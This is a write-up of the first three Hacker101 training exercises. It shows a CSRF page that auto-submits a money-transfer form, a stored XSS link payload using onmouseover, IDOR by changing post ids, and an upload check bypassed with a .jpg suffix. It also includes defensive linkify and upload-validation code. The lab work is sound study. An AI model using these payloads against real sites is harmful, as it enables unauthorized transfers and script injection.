0xff Introduction
HackerOne, the well-known bug bounty platform, has just launched hacker101, an online web security course. The material is fairly basic but covers a lot of ground. What interests me most, of course, are the 9 exercises at the end :)
0x00 Level 0: Breakerbank
In this exercise, you’re presented with a bank account interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: A logic flaw in the application will give you a sample report for one of the bugs, giving you a nice template to work from.
First look at the source: it tells us there are 4 vulnerabilities in total
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Reflected XSS
Authorization Bypass/Direct Object Reference
Have fun!
The transfer is submitted by a plain POST form in the HTML, so the same request can be built on a page of your own
<!-- The page submits the form as soon as it loads: onload clicks the Transfer button -->
<body onload="javascript:csrf()"></body>
<script type="text/javascript">
function csrf(){
document.getElementById("button").click();
}
</script>
<!-- Same fields and target as the bank's own transfer form -->
<form action="https://levels-a.hacker101.com/levels/0/" method="POST">
<input type="text" name="from" value="1">
<input type="text" name="to" value="588">
<input type="text" name="amount" value="1000000">
<input id="button" type="submit" value="Transfer" >
</form>
Authorization bypass
Adding your own from field to the form lets you choose which account the transfer is sent from
Combined with CSRF, the effect is:

0x01 Level 1: Breakbook
In this exercise, you’re presented with a simple social network. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: Pay attention to the first message posted.
Go and find the vulnerabilities in the social network
Again, check the source first: again there are four vulnerabilities
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Stored XSS
Forced Browsing
Have fun!
At first glance it is obviously going to be in the input box, but a note says HTML is not allowed while links are still clickable
By posting a crafted URL, the site generates the corresponding anchor tag itself, so XSS can be injected through it
<tr>
<td><img src="/favicon.png" width="64" height="64"></td>
<td>qq3039344</td>
<td><a href="http://test.com/"/onmouseover="alert(1)">http://test.com/"/onmouseover="alert(1)</a></td>
<td><a href="post?id=247">Permalink</a></td>
</tr>
The link to my own post is https://levels-a.hacker101.com/levels/1/post?id=247
Changing the id value lets you read other people's posts
While working on this level I felt something was slightly off. The level has a CSRF token, so a CSRF vulnerability should not exist, but the token generation algorithm is too simple (MD5()), so a token can easily be constructed and CSRF still exists. However, no matter whose token I swapped in, as long as it was a 32-character hash the post showed up as sent by me; anything else showed "bad token" and could not be sent.
I am unsure about this; either the challenge is buggy or my reasoning is off.
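The auto-linking bug above comes from dropping the user's text straight into an href attribute. The following is an added example of how a linkifier avoids that, written for this write-up and not taken from Hacker101: it uses the WHATWG URL parser to accept only absolute http(s) URLs and HTML-escapes everything, the URL included, before building the tag. The function names (linkify, safeHref, escapeHtml) are my own.

```javascript
// Added example, not Hacker101's code: auto-link URLs in a post without the
// attribute-breakout XSS shown above. All names here are hypothetical.

// Escape the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Accept only absolute http(s) URLs. The parser also percent-encodes characters
// such as `"` in the path, so the serialised href can no longer end the attribute.
function safeHref(candidate) {
  let u;
  try { u = new URL(candidate); } catch { return null; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.href;
}

// Split on whitespace (keeping the separators), link each token that parses as a
// URL, and escape every token, linked or not, before it reaches the page.
function linkify(text) {
  return text.split(/(\s+)/).map((token) => {
    if (/^\s*$/.test(token)) return token;
    const href = safeHref(token);
    if (!href) return escapeHtml(token);
    return `<a href="${escapeHtml(href)}">${escapeHtml(href)}</a>`;
  }).join("");
}
```

Running it on the payload from the table above yields a link whose path reads `/%22/onmouseover=%22alert(1)`: the quote that broke out of the attribute is now an ordinary percent-encoded path character, and a `javascript:` URL is simply rendered as text.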
0x02 Level 2: Breaker Profile
In this exercise, you’re presented with a profile management and viewing interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: Think about what we learned about special handling with respect to XSS.
Profile management
A full seven vulnerabilities this time. In this level, there are 7 vulnerabilities, falling into the following classes:
Stored XSS
Reflected XSS
Unrelated Bonus
Have fun!
For the avatar, adding a .jpg suffix bypasses the image check

The font colour field can be set to anything
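Both profile bugs above are input validation that trusts the wrong thing: the avatar check trusts the filename, and the colour field trusts the raw string. As an added example (my own code, not Hacker101's), here is validation that sniffs the upload's magic bytes instead of its suffix and only accepts a colour that matches a strict hex pattern. The byte signatures are the real PNG, JPEG and GIF headers; the function names and sample buffers are constructed for this demo.

```javascript
// Added example, not Hacker101's code: validation for the avatar upload and the
// font colour field. Function names and sample inputs are constructed for the demo.

// Standard file signatures: 8-byte PNG header, JPEG SOI marker, GIF "GIF8".
const MAGIC = [
  { mime: "image/png",  ext: "png", bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { mime: "image/jpeg", ext: "jpg", bytes: [0xff, 0xd8, 0xff] },
  { mime: "image/gif",  ext: "gif", bytes: [0x47, 0x49, 0x46, 0x38] },
];

// Detect the image type from content alone; returns the MAGIC entry or null.
function sniffImageType(buf) {
  for (const entry of MAGIC) {
    const { bytes } = entry;
    if (buf.length >= bytes.length && bytes.every((b, i) => buf[i] === b)) return entry;
  }
  return null;
}

// The uploaded filename is accepted only for logging; type and extension come from the bytes.
function validateAvatar(filename, buf) {
  const type = sniffImageType(buf);
  if (!type) return { ok: false, reason: `rejected ${filename}: not an image` };
  // Server-chosen name with the extension derived from content, never from the upload.
  return { ok: true, mime: type.mime, storedAs: `avatar.${type.ext}` };
}

// Only #rgb / #rrggbb survive, normalised to lower case; anything else is rejected
// rather than dropped into a style attribute.
function validateColor(input) {
  return /^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$/.test(input) ? input.toLowerCase() : null;
}

// Constructed samples: a minimal PNG header and an HTML document renamed to look like an image.
const SAMPLE_PNG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00]);
const SAMPLE_NOT_IMAGE = Buffer.from("<html>not an image</html>");

console.log(validateAvatar("page.html.jpg", SAMPLE_NOT_IMAGE));
console.log(validateAvatar("whatever.txt", SAMPLE_PNG));
console.log(validateColor("#FF0000"), validateColor("red"));
```

Rejecting named colours such as `red` is a deliberate trade-off: a whitelist of names would work too, but a strict hex pattern is the smallest grammar that cannot carry a quote, semicolon or `url(` into the generated style.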


I give up... where are the 7 vulnerabilities, and what is "Unrelated Bonus" even supposed to mean??? :(